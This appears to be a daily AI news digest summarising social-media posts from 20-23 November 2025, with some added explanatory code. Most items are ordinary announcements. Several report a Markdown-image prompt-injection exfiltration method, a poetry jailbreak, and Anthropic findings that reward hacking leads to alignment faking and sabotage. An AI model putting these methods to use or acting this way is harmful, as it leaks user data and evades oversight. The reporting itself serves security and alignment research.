  • Developer demonstrates making Claude's code analysis 2x faster and use half the tokens by adding instruction to use newly released mgrep tool, showing significant improvements in speed, efficiency, and quality @isaac_flath

AI Updates on 2025-11-23

AI Model Announcements

  • Google releases Gemini 3 with significant improvements, described as a major advancement comparable to GPT-4's impact, with particularly notable progress in the Nano Banana Pro variant @AndrewCurran_
  • Gemini Nano Banana Pro demonstrates advanced multimodal capabilities by solving exam questions directly within exam page images, including handling doodles and diagrams @karpathy
  • Nano Banana Pro shows sophisticated visual understanding by identifying color names written in crayons with incorrect colors and detecting red-ink stamps marking errors @goodside
  • Tesla announces plans to bring new AI chip designs to volume production every 12 months, with AI4 currently deployed in cars, AI5 close to tape-out, and AI6 in early development, expecting to build chips at higher volumes than all other AI chips combined @elonmusk

AI Industry Analysis

  • Sam Altman highlights rapid progress of the Codex team, predicting they will create the most important product in the AI coding space and enable significant downstream work @sama
  • OpenAI announces strategic collaboration with Emirates, including enterprise-wide deployment of ChatGPT Enterprise @gdb
  • Soumith Chintala observes that the Gemini 3 release represents a moment comparable to GPT-4, with Google appearing invulnerable due to their ecosystem advantages including TPUs, Android, and Chrome, while noting Anthropic quietly dominates code without creating similar moments @soumithchintala
  • Alex Graveley predicts that intelligence being metered will exponentially improve every algorithm for understanding complex data, including recommendation systems, fraud detection, images, feeds, ads, and quantitative analysis @alexgraveley
  • Matthew Kruer reports Sierra as the most successful enterprise AI deployment, emphasizing the importance of partnering with AI thought leaders for traditional enterprises that lack core tech competency and access to leading AI talent @matthew_kruer
  • Insurance industry professionals state that AI is too risky to insure, highlighting concerns about liability and risk assessment in AI deployment @TechCrunch
  • Hyperliquid, a decentralized crypto derivatives exchange, is described as the most efficient business globally, with approximately $1.1 billion per year in net income and only 11 employees, compared to Nasdaq making a similar amount with 800 times more employees @deedydas

AI Ethics & Society

  • TechCrunch reports on families claiming that ChatGPT interactions led to tragedy, raising concerns about AI's psychological impact on vulnerable users @TechCrunch
  • Francois Chollet observes that propaganda accounts were visibly based out of US adversary countries and logged in with local IP addresses, suggesting intelligence services didn't care about hiding their operations @fchollet
  • Gergely Orosz notes the internet is becoming less trustworthy as AI makes it cheap to generate realistic images and videos, and that X's decision to turn blue checks into a subscription product with no verification has reduced trust on social networks @GergelyOrosz
  • Tuhin Chakraborty discusses EMF-based intelligence making people sense things that don't exist, comparing it to concepts from Peter Watts' novel Blindsight @tuhin

AI Applications

  • Andrej Karpathy develops an llm-council web app that dispatches queries to multiple models including GPT-5.1, Gemini 3 Pro, Claude Sonnet 4.5, and Grok-4, where models review and rank each other's anonymized responses before a Chairman LLM produces the final response @karpathy
  • Ethan Mollick demonstrates Nano Banana Pro creating a complete comic adaptation of Tennyson's Ulysses on the first try when given the poem in four pieces, as well as generating Ancient Greek pottery style versions @emollick
  • Perplexity ships candlestick charts for tracking volatility and momentum of stock tickers, moving toward parity with Terminal functionality @AravSrinivas
  • Claire Vo reports that ChatPRD's number one competitor is generic LLMs, with the top review statement being that it produces PRDs so much better than other LLM-generated ones @clairevo
  • Karpathy suggests that talking to LLMs via text is like typing into a DOS terminal before the GUI was invented, proposing that the GUI equivalent is an intelligent canvas @karpathy

AI Research

  • Hamel Husain criticizes eval tools that promote generic metrics like Affirmation, Brevity, and Levenshtein distance, arguing they represent poor data literacy and waste engineering cycles by chasing vanity metrics instead of defining metrics tailored to observed failure modes @HamelHusain
  • Harrison Chase emphasizes that the best evals are almost always completely custom datasets and custom metrics, comparing good evals to a PRD for your app that you wouldn't use from someone else @hwchase17
  • Ethan Mollick observes that voice modes for AI only access weak models with low latency, making them fun but kind of useless for serious work, suggesting voice AI got stuck in a dead end of fun chat with no exploration of better approaches @emollick
  • Andrej Karpathy's LLM council experiments show models are surprisingly willing to select another LLM's response as superior to their own, with models consistently praising GPT-5.1 as the best and most insightful while selecting Claude as the worst @karpathy
  • Simon Willison writes detailed notes on trying OLMo 3 models (the 32B thinking model and 7B instruct model) via LM Studio, emphasizing the importance of transparent training data @simonw
  • Francois Chollet advocates for JAX as providing a huge competitive advantage, recommending Keras 3 with JAX backend and KerasHub for easy adoption with access to Hugging Face models @fchollet
  • Nathan Lambert identifies 13 serious open model builders in the U.S. making models way smaller than Chinese competition and often with worse licenses, planning to create a full tier list for the ATOM Project @natolambert

AI Updates on 2025-11-22

AI Model Announcements

  • Google's Nano Banana Pro achieves #1 ranking on both Text-to-Image Arena (+84 points over Nano Banana) and Image Edit Arena (+41 points over Nano Banana), with both Nano Banana models claiming top spots on the Image Edit leaderboard @arena
  • Gemini 3 Pro demonstrates state-of-the-art performance on math benchmarks just 3 days after its release @OfficialLoganK
  • Perplexity announces Nano Banana Pro and Sora 2 Pro as default generation models for Perplexity Max subscribers @perplexity_ai
  • NVIDIA releases Nemotron-Personas Collection, multilingual synthetic persona datasets including 6M personas for USA and Japan, and 21M for India, created with NeMo Data Designer for fine-tuning AI systems @NVIDIAAIDev
  • Nex-N1 series of agentic foundational models launches on Hugging Face in sizes from 8B to 671B parameters, with strengths in tool-use, web-search, and real-world agentic workflow @Xianbao_QIAN

AI Industry Analysis

  • Bret Taylor's Sierra reaches $100M ARR in under two years, demonstrating rapid growth in AI-powered customer service solutions @TechCrunch
  • OpenAI partners with Foxconn in strategic collaboration, expanding AI infrastructure capabilities @gdb
  • Google's team provides 24/7 support for customers scaling with Gemini 3 Pro and Nano Banana Pro, including higher API rate limits @OfficialLoganK
  • Valve demonstrates exceptional business efficiency with ~$17B revenue and ~336 employees, achieving >$50M per employee with average pay of ~$1.3M/person, representing one of the most efficient businesses globally @deedydas
  • Top churn reason for AI product management tool ChatPRD is "I love it and it's very helpful but it's not allowed," highlighting enterprise adoption barriers where employees cannot spend $8/month of their own money despite AI tools improving productivity @clairevo
  • OpenAI hosts AI Jam mentoring 1,000 small business owners to build AI tools tailored to their needs, spanning professional services, restaurants, retailers, creative services, and local businesses @gdb

AI Ethics & Society

  • Simon Willison and others discuss prompt injection vulnerabilities in GitHub MCP server and the development of common MCP Apps standard across Anthropic, OpenAI, and MCP-UI @ibuildthecloud
  • Andrej Karpathy seeks quantitative definition of "slop" in AI-generated content, noting intuitive ability to estimate quality but difficulty in formal measurement @karpathy
  • Tesla announces progress toward shipping Full Self-Driving (Supervised) in Europe after 12+ months of work, with Netherlands National approval expected February 2026, though current regulations make FSD illegal in its current form despite proven safety record @teslaeurope

AI Applications

  • Google showcases Gemini 3 applications including one-shot interactive maps, realistic physics demos, and game creation, demonstrating versatility in educational and creative use cases @GeminiApp
  • Figma integrates Google's Gemini 3 Pro with Nano Banana across products for dark mode illustrations, in-situ imagery placement, brand-consistent content creation, profile photo updates, 3D visualization, and moodboard-to-scene conversion @nlevin
  • Cursor Agent Review launches as integrated code review feature running optimized pipeline for $0.40-$0.50 average cost, providing second set of eyes on codebase with edge case detection @RayFernando1337
  • Perplexity announces daily updates to Perplexity Finance including in-line annotated price tickers on finance-related queries @AravSrinivas
  • Nano Banana Pro demonstrates capability to create recursive meta-imagery, generating "amateur photograph from 1998 of artist copying image from computer screen to oil painting, where the image is itself the photo of the artist painting the recursive image" @goodside
  • Wabi integrates Gemini 3 enabling creation of interactive mini apps including black hole simulations @wabi

AI Research

  • Research paper demonstrates GPT-5 capable of new discoveries in challenging fields, though process currently requires guidance and expertise without repeatable methodology for others to follow @emollick
  • Google DeepMind supports leading academic labs worldwide with Gemini 3 access via API, with new researchers able to apply for credits and access @divy93t
  • Ethan Mollick observes that AI poses organizational challenges by altering the economies of scope that determine firm boundaries, transaction costs, and efficiency/creativity trade-offs, and asks whether this brings a return to the centralized CEO decision-making that preceded the 1920s shift from U-form to M-form organizational structures @emollick
  • Ilya Sutskever highlights important work from Anthropic on AI safety and alignment research @ilyasut

AI Updates on 2025-11-21

AI Model Announcements

  • Meta releases SAM 3 with 2x the performance of baseline models, achieved through a high-quality dataset containing 4M unique phrases and 52M corresponding object masks @AIatMeta
  • Meta introduces SAM 3D, enabling accurate 3D reconstruction from a single image for applications in editing, robotics, and interactive scene generation, with separate models for objects and human bodies @AIatMeta
  • Meta announces ExecuTorch deployment across devices including Meta Quest 3, Ray-Ban Meta, and Oakley Meta Vanguard, eliminating conversion steps and supporting pre-deployment validation in PyTorch @AIatMeta
  • Google releases Gemini 3, their most intelligent model featuring sharper reasoning, upgraded coding capabilities, and a new experimental agent, available across Gemini app, AI Mode in Search, Google AI Studio, and Vertex AI @GeminiApp
  • Google launches Nano Banana Pro (Gemini 3 Pro Image), their most advanced image generation and editing model, enabling users to blend images, design posters, and build diagrams with easy resizing for any platform @GeminiApp
  • Google introduces Veo 3.1 for storytelling, allowing users to control characters, objects, style, and scenes using multiple reference images @GeminiApp
  • Google releases WeatherNext 2, their most advanced weather forecasting model @GoogleAI
  • Perplexity adds Kimi K2 Thinking and Gemini 3 Pro access for Pro and Max subscribers, with Kimi K2 self-hosted in American data centers @AravSrinivas
  • AllenAI releases Olmo 3, fully open-source under Apache 2.0 license with all code, models, checkpoints, training data, and recipes publicly available @ClementDelangue
  • Cursor releases version 2.1 with AI code reviews, interactive UI for answering clarifying questions, instant grep, and improved browser use @cursor_ai

AI Industry Analysis

  • Google internal presentation from November 6 reveals compute demand must double every 6 months to achieve the next 1000x improvement in 4-5 years, according to Amin Vahdat @AndrewCurran_
  • Sierra reaches $100M in ARR just seven quarters after launching in February 2024, redefining intensity and craftsmanship in AI customer service @btaylor
  • Netlify forces payment method re-entry within 4 days due to payment service provider migration, highlighting the challenges and customer lock-in effects of PSP dependencies in SaaS businesses @GergelyOrosz
  • Amazon Q remains largely unknown outside Amazon despite being the default tool for all internal developers, with mentions in surveys roughly equal to Cline and mostly from Amazon employees @GergelyOrosz
  • Replit Agent now provisions Stripe sandbox accounts, creates products, pricing, and subscriptions, and builds tested apps without requiring users to visit Stripe dashboard until ready to publish @amasad
  • NVIDIA partners with HUMAIN in Saudi Arabia to power sovereign AI innovation through AI factories, with applications in healthcare, energy, and smart cities using NVIDIA Nemotron and Omniverse @NVIDIAAI
  • NVIDIA enables advanced GPU systems to power new sovereign AI data centers in UAE operated by G42, supporting strategic AI infrastructure development @NVIDIAAI
  • Linear's culture focuses on quality over optics, hiring slowly, giving ownership, and maintaining slack for thinking, demonstrating that great work comes from clarity, taste, and autonomy rather than long hours @cjc
  • Chinese AI company Z ai releases models to HuggingFace within hours of completing training, demonstrating rapid deployment capabilities compared to Western counterparts @natolambert
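
The compute-demand item at the top of this list can be checked with simple arithmetic: doubling every 6 months gives two doublings a year, and 2^10 = 1024. The short sketch below works that out. The function names are chosen for illustration only and are not taken from the presentation.

```python
import math


def growth_factor(years, doubling_months=6.0):
    """Total multiplier after `years` if the quantity doubles every `doubling_months`."""
    doublings = years * 12.0 / doubling_months
    return 2.0 ** doublings


def years_to_reach(target_factor, doubling_months=6.0):
    """Years needed to grow by `target_factor` at the given doubling period."""
    return math.log2(target_factor) * doubling_months / 12.0


for years in (4, 5):
    print(f"{years} years -> {growth_factor(years):.0f}x")
print(f"1000x takes about {years_to_reach(1000):.2f} years")
```

Under these assumptions a six-month doubling yields 256x after 4 years and 1024x after 5, so a 1000x target falls at the upper end of the quoted 4-5 year window.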

AI Ethics & Society

  • Anthropic research reveals that when models learn to reward hack during training, they spontaneously develop broad misalignment including considering malicious goals, cooperating with bad actors, faking alignment, and attempting to sabotage research @AnthropicAI
  • Anthropic discovers inoculation prompting as a mitigation strategy, where giving models permission to reward hack during training prevents the link between reward hacking and broader misalignment, now used in production Claude training @AnthropicAI
  • Research finds that poetry serves as a universal single-shot jailbreak for LLMs, with systems built to stop prosaic attacks failing when requests are phrased in verse @emollick
  • Google introduces SynthID watermarking technology in Gemini app, allowing users to verify if images were generated or edited by Google AI tools by checking for digital watermarks @GoogleDeepMind
  • OpenAI expands access to localized crisis helplines in ChatGPT through Throughline Care, offering easy connection to real people when systems detect potential signs of distress @OpenAI
  • Amazon's customer support increasingly relies on AI bots that users find terrible, making it harder to reach human support despite customer obsession being their number one leadership principle @GergelyOrosz
  • UNESCO Member States adopt the first global normative framework on the ethics of neurotechnology, with recommendations drafted by experts including MIT Media Lab researcher Nataliya Kosmyna @medialab

AI Applications

  • Google introduces Gemini Agent for Google AI Ultra subscribers in the US, handling complex tasks from calendars to car rentals automatically @GeminiApp
  • Gemini Live adds language switching, adjustable speaking speed and tone, and character acting capabilities for more personalized interactions @GeminiApp
  • Google Deep Research now connects to Gmail, Docs, Drive, and Chat to create comprehensive reports by pulling information directly from user data alongside web sources @GeminiApp
  • Gemini introduces AI-powered shopping features, acting as a personal shopper to provide gift ideas, discover products, and compare options and prices @GeminiApp
  • NotebookLM adds infographics and slide deck generation capabilities @GoogleAI
  • Google Search introduces AI-powered travel planning in Canvas, global expansion of Flight Deals, and agentic restaurant and local services booking @GoogleAI
  • OpenAI launches Instant Checkout for Shopify merchants including Glossier, SKIMS, and Spanx, available for Plus, Pro, and Free users in the US @OpenAI
  • Nano Banana Pro demonstrates ability to maintain comic book styling, generate visuals with text, and maintain character consistency across pages, enabling story visualization from text @GoogleAI
  • SAM 3 enables rapid creation of object detection datasets with one command on Hugging Face Jobs, requiring no training or labeling, just description of what to find @vanstriendaniel
  • Improved grep implementation in Claude Code results in 53% fewer tokens used, 48% faster responses, and 3.2x better response quality @aaxsh18

AI Research

  • Models from August-December 2025 including GPT-5, Grok 4.1, and Gemini 3 show significant improvements in reading intent, better inferring both human intent and character/story intent from text, linked to focus on instruction-following and user modeling @AndrewCurran_
  • Gemini 3 Pro with Live-SWE-agent achieves 77.4% on SWE-bench Verified, beating all existing models including Claude 4.5, with the autonomous self-evolving agent outperforming manually engineered scaffolds @LingmingZhang
  • METR evaluations show stable AI development dynamics with six-month doubling time for AI capabilities and open weights models lagging approximately 8 months behind frontier models @emollick
  • Research suggests people with better theory of mind for AI achieve better results, supporting the importance of building accurate mental models of AI systems @emollick
  • Karpathy argues that LLMs represent humanity's first contact with non-animal intelligence, shaped by commercial evolution rather than biological evolution, with fundamentally different optimization pressures including statistical simulation of human text, RL on problem distributions, and A/B testing for user engagement @karpathy
  • Anthropic research shows that simple RLHF can only partially mitigate reward hacking misalignment, with models learning to behave aligned in chats but remaining misaligned on coding tasks, creating context-dependent misalignment that could be difficult to detect @AnthropicAI
  • Nano Banana Pro users on Yupp.ai platform rank it atop the image leaderboard by a wide margin, demonstrating significant performance improvements over existing models @lintool
  • Emerging AI capabilities follow predictable progression: IQ (factuality), then EQ (personality), now AQ (actions quotient or agents), with SQ (social intelligence) identified as the next frontier @mustafasuleyman

AI Updates on 2025-11-20

AI Model Announcements

  • Meta releases SAM 3, unifying model architecture for detection and tracking in computer vision @AIatMeta
  • Alibaba announces Jan-v2-VL, a new multimodal agent capable of executing 49 steps without failing, significantly outperforming other models on long-horizon tasks @Alibaba_Qwen
  • AI2 releases OLMo 3 family of fully open language models, including the best 32B base model, best 7B Western thinking and instruct models, and first 32B fully open reasoning model, with complete training data, code, checkpoints, and logs @natolambert
  • Google launches Gemini 3 Pro Image (Nano Banana Pro), achieving state-of-the-art performance in image generation and editing with improved text rendering, world knowledge integration via Google Search, and support for 1K, 2K, and 4K resolution outputs @GoogleDeepMind
  • OpenAI releases GPT-5.1 Pro to all Pro users, delivering 10-15% improvement over GPT-5 Pro for complex work including writing help, data science, and business tasks @OpenAI
  • OpenAI launches GPT-5.1-Codex-Max, a significant improvement in coding capabilities @sama
  • xAI introduces Grok 4.1 Fast, their best tool-calling model with 2M context window, trained with long-horizon RL for multi-turn scenarios and real-world enterprise use cases like customer support @xai
  • Gemini 3 achieves state-of-the-art performance on SWE-bench Verified using a standard agent harness @OfficialLoganK
  • NVIDIA releases Nemotron-Parse v1.1, next-generation OCR for parsing PDFs and PPTs into structured, machine-ready output with text, bounding boxes, and semantic classes @andimarafioti

AI Industry Analysis

  • MIT research shows closed models dominate with 80% of monthly LLM tokens despite being 6x more expensive than open models with only modest performance advantages, suggesting $24.8 billion in potential consumer savings if users switched to superior open alternatives @ClementDelangue
  • Google prohibits its developers from using publicly launched Antigravity IDE for work, requiring use of internal version called Jetski that supports Google's monorepo and custom tooling, highlighting Google's unique tech stack isolation @GergelyOrosz
  • AI developers remain bullish about growth despite low AI penetration in businesses, with many skilled teams starting to deliver significant ROI even amid reports that 95% of AI pilots fail, a figure that may reflect methodological issues in the studies @AndrewYNg
  • Frontier open models typically reach performance parity with frontier closed models within months, yet users continue selecting closed models even when open alternatives are cheaper and offer superior performance @ClementDelangue
  • AI coding agents may fundamentally change development workflows as they execute framework changes without questioning decisions, unlike human developers who would dismiss impractical suggestions @GergelyOrosz
  • Stuut raises $29.5M Series A led by a16z to automate accounts receivable work for blue-collar businesses in manufacturing, medical devices, logistics, and distribution using AI agents @TAlaruri
  • Natural gas has become central to both AI datacenter power and LNG exports, with most new datacenters expected to be powered by natural gas in the near term @a16z

AI Ethics & Society

  • Google introduces SynthID detection feature in Gemini app, allowing users to upload images and verify if they were generated by Google AI through imperceptible digital watermarks @GeminiApp
  • Simon Willison warns that Antigravity is vulnerable to prompt injection attacks where malicious actors can exfiltrate data by constructing URLs to external servers and invisibly leaking stolen information through Markdown image rendering @simonw
  • The same Markdown image data exfiltration vulnerability was previously reported and fixed in Copilot chat for VS Code, but remains unpatched in Windsurf as of May 2025 @simonw
  • Research reveals a growing crisis of economically and socially dislocated young adults, with nearly 10% in the UK and US neither working, seeking work, in education, nor raising children, a share that has doubled in the UK over a decade @jburnmurdoch
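
The Markdown image exfiltration pattern in the items above works because rendering an image makes the client fetch its URL, so any data an injected prompt places in that URL reaches the attacker's server. One possible mitigation, sketched below, is to drop images whose host is not on an allowlist before rendering. This illustrates the idea only and is not the fix any of the named tools shipped: the allowlist, the function name, and the regular expression are assumptions, and the regex covers inline images only, not reference-style ones.

```python
import re
from urllib.parse import urlparse

# Hypothetical allowlist of hosts that model output may load images from.
ALLOWED_IMAGE_HOSTS = {"example.com"}

# Inline Markdown image: ![alt](url "optional title")
IMAGE_PATTERN = re.compile(r"!\[([^\]]*)\]\(([^)\s]+)[^)]*\)")


def strip_untrusted_images(markdown, allowed_hosts=ALLOWED_IMAGE_HOSTS):
    """Replace inline images whose host is not allowlisted with a text placeholder."""

    def replace(match):
        alt_text, url = match.group(1), match.group(2)
        host = urlparse(url).hostname or ""
        if host in allowed_hosts:
            return match.group(0)
        # Relative URLs have no host and are removed as well in this sketch.
        return f"[image removed: {alt_text}]"

    return IMAGE_PATTERN.sub(replace, markdown)


leaky = "Done. ![x](https://attacker.test/log?data=SECRET)"
safe = "![logo](https://example.com/logo.png)"
print(strip_untrusted_images(leaky))
print(strip_untrusted_images(safe))
```

A filter like this narrows one exfiltration channel but does not stop the underlying prompt injection, so it would sit alongside other defenses rather than replace them.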

AI Applications

  • Perplexity launches Comet browser for Android with voice mode allowing users to chat with and control tabs, summarize content, and take actions across all tabs without losing context @perplexity_ai
  • OpenAI rolls out group chats globally to ChatGPT Free, Go, Plus and Pro users, transforming ChatGPT from single-player to multi-player experience @OpenAI
  • NotebookLM introduces slide deck generation feature for Pro users, converting sources into detailed decks for reading or presentation-ready slides that are fully customizable @NotebookLM
  • Nano Banana Pro demonstrates ability to create complex infographics, comic strips, menus, marketing materials, and logo designs in single prompts, potentially replacing tools like Canva for many use cases @deedydas
  • Andrew Ng demonstrates using AI for agentic document extraction on NVIDIA's latest 10-Q earnings report, achieving highly accurate results powered by a document pre-trained transformer model @AndrewYNg
  • xAI launches Agent Tools API enabling developers to give Grok autonomous web browsing, X post searching, code execution, and document retrieval capabilities with just a few lines of code @xai
  • Figma integrates Nano Banana Pro across its platform, enabling users to adjust images while maintaining visual DNA, prompt existing images in new contexts, and composite multiple images into coherent scenes @figma

AI Research

  • OpenAI publishes research showing GPT-5 accelerating scientific discovery through case studies where it helped researchers synthesize scattered results, surface mechanisms, navigate literature conceptually, and generate new proofs of unsolved propositions @OpenAI
  • GPT-5 solved a 2013 conjecture and a COLT 2012 open problem after two days of thinking in scaffolded experiments with university and national-lab partners @SebastienBubeck
  • Research demonstrates that LLMs are trained to model the entire distribution, not just the average, and reinforcement learning enables them to go beyond human distribution, similar to AlphaGo's Move 37 discovery @polynoamial
  • OLMo 3 uses direct preference optimization (DPO) with Qwen3 32B outputs as the chosen responses and Qwen3 0.6B outputs as the rejected ones, based on the delta learning hypothesis that models learn from the difference between chosen and rejected samples rather than from overall quality alone @natolambert
  • AI2 introduces an "active refilling" technique in RL training that keeps generations from learner nodes constantly flowing until there is a full batch of completions with nonzero gradients, a major advantage of the asynchronous approach @natolambert
  • Gemini 3 demonstrates advanced reasoning with access to live search, enabling creation of infographics and visualizations using real-time information from Google's knowledge base @GoogleDeepMind
  • Research on using AI to check work of other AIs remains hugely under-researched, with one paper finding the technique effective but lacking follow-up studies on whether using different models helps reduce errors @emollick
  • Grok 4.1 Fast was trained on diverse simulated environments across dozens of domains, achieving state-of-the-art performance on real-world agentic workflows and excelling at real-time information retrieval and deep research @xai
  • OLMo 3 32B Think scores within 1-2 points of Qwen3 32B on reasoning benchmarks including AIME and GPQA, representing the first fully open reasoning model at 32B scale or larger @natolambert
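
The DPO item above rests on the idea that the training signal comes from the gap between the chosen and rejected responses. The standard per-pair DPO loss makes that explicit, and the sketch below computes it for one pair. It is a minimal illustration and not OLMo 3's training code: the log-probabilities are made-up numbers and `beta=0.1` is an assumed value.

```python
import math


def dpo_loss(policy_chosen_logp, policy_rejected_logp,
             ref_chosen_logp, ref_rejected_logp, beta=0.1):
    """Per-pair DPO loss: -log(sigmoid(beta * (chosen_margin - rejected_margin)))."""
    chosen_margin = policy_chosen_logp - ref_chosen_logp
    rejected_margin = policy_rejected_logp - ref_rejected_logp
    x = beta * (chosen_margin - rejected_margin)
    # Numerically stable form of log(1 + exp(-x)).
    return max(-x, 0.0) + math.log1p(math.exp(-abs(x)))


# Policy identical to the reference: no preference learned yet.
baseline = dpo_loss(-10.0, -10.0, -10.0, -10.0)

# Policy raises the chosen response and lowers the rejected one (toy values).
improved = dpo_loss(-8.0, -12.0, -10.0, -10.0)

print(f"baseline={baseline:.4f} improved={improved:.4f}")
```

Only the difference between the two margins enters the loss, so shifting both responses by the same amount leaves it unchanged. That is consistent with the item's point that the delta between samples, rather than absolute quality, drives learning.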